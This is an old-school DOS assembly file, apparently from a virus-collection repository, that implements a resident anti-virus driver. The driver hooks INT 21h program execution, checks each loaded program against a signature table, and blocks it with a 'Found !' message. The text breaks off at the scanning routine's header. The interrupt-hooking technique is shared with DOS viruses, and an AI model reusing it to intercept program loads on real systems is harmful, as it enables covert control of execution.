antig.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

.286
.model small
include push.mac
.code

assume cs:_TEXT,ds:_TEXT

                org     000h
next_dev        dd     0FFFFFFFFh
devatt          dw      8000h
                dw      offset strategy
                dw      offset interrupt
nam             db      'antigame'

start proc far


old_si  dw      0
old_bx 	dw	0
old_cx	dw	0
old_dx	dw	0
es_main	dw	0
num_ff	dw	0
last_pag dw	0
viroff	dw	0
cnt	db	0
count	db	0
scan_seg dw     0
mes db 'Found !','$'
filnm   db      15 dup(0)
buffer  db      'NCMAIN.EXE',0h,0h,0h,0h,0h
	db	'QA.COM',
        db      64 dup (0)

include datagame.inc


int_21h_entry:

        pushf					; Push flags
	sti					; Enable interrupts
	cmp	ah,4Bh				;
        je      loc_25                          ; Jump if equal

loc_24:
	popf					; Pop flags
	db	0EAh
old_21h_off  dw	 ?
old_21h_seg  dw  ?


loc_25:
	cmp	cs:cnt, 0
	jne	loc_204
	inc	cs:cnt
	jmp	loc_24
loc_204:
	mov	cs:old_bx,bx
	push	ax
	push	cx
	push	di
	push	es
        push    ds
        push    si
	push	dx

        mov     si,dx
loc_205:
	inc	si
	cmp byte ptr ds:[si],0
	jne	loc_205
	mov	bh,0
loc_206:
	inc	bh
	dec	si
	cmp byte ptr ds:[si],'\'
	jne	loc_206
	inc	si
	dec	bh
	push	cs
	pop	es
	xor	cx,cx
	mov	bl,-1
loc_94:
        inc     bl
        lea     di,cs:buffer
        mov     ax,15
        mul     bl
        add     di,ax
        push    si
        mov     cl,bh
        rep     cmpsb
        pop     si
        je      loc_57
        cmp     bl,4
        jne     loc_94
        jmp short loc_95

loc_57:
        mov     byte ptr cs:count,0
        jmp     loc_fin

loc_95:
	mov	cl,bh
        lea     di,cs:filnm
        repne movsb
        sub     si,3
        cmp word ptr ds:[si],'XE'
	jne	loc_47
	lea	ax,cs:only_exe
	mov  byte ptr bl,cs:only_exe_count
        jmp short loc_files

loc_47:
        cmp  word ptr ds:[si],'OC'
	je     loc_79
	lea	ax,cs:ov_pi
	mov    byte ptr bl,cs:ov_pi_count
        jmp short loc_files

loc_79:
	lea	ax,cs:com_exe
	mov  byte ptr bl,cs:com_exe_count

loc_files:

	mov	cs:viroff,ax
        mov     byte ptr cs:count,bl

        mov     ah,3dh
	xor	al,al
	int 	21h      ; file is open for reading
	jc	loc_fin

        mov     bx,ax
	mov	ah,42h
	xor	cx,cx
	mov	dx,cx
	mov	al,2
	int	21h	; seek to the end

       	mov	cs:num_ff,dx	  ; save number of 64k
	mov	cs:last_pag,ax    ; save length of last page

	mov	ah,3eh
	int	21h     ; close the file

loc_fin:
	pop	dx
        pop     si
        pop     ds
	pop	es
	pop	di
	pop	cx
	pop	ax
	cmp	al,0
	jne	lc_en
	jmp short loc_en
lc_en:
	mov	bx,cs:old_bx
	mov word ptr bx,es:[bx]
	mov word ptr cs:scan_seg,bx
	popf
	pop	cs:old_ovl_off
	pop	cs:old_ovl_seg
	push	cs
	push	offset cs:fal_ovl
	pushf

loc_en:
	mov	bx,cs:old_bx
	jmp	loc_24

fal_ovl:
	pushf
	push	es
        push    ds
	push	ax

	mov	dx,cs:scan_seg
	push	cs
	pop	ds
	call    scanvir
	pop	ax
	jnc	loc_nvi
	call	message
	mov	di,cs:old_ovl_seg
	mov	es,di
	mov	di,cs:old_ovl_off
	mov	es:[di],21cdh
	mov	ah,4ch
loc_nvi:
        pop     ds
	pop	es
	popf
	db	0EAh
old_ovl_off  dw  ?
old_ovl_seg  dw  ?


message:
        mov     dx,si
        mov     ah,09h
        int    21h
        lea     dx,mes
        mov     ah,09h
        int    21h
	ret

int_4b_scan:

	pushf
        mov     old_bx,bx
	mov	old_dx,dx
;	push	cs
;	pop	ds
;	add     dx,10h            ; dx = Start seg

;	call	scanvir
;	jc	loc_vir

        mov     ax,old_bx
	mov	dx,old_dx
        mov     ds,dx
        mov     es,dx
	popf
	retf

loc_vir:
;	call	message
        pop     dx
	pop	dx
        pop     ds
	mov	dx,old_dx
        push    dx
        xor     dx,dx
        push    dx
        retf


scanvir:
	; dx = segment for scan	 (offset = 0)
	; cs:viroff = offset of virtable
	; ds = segment of virtable
	; cs:count = number of viruses
	; cs:num_ff = number of 64k
	; cs:last_pag = number of bytes in last page
	; return bit c if virus is founded
	; ds:si points to the viruses name
	; bp,es,di,bx,ax,dx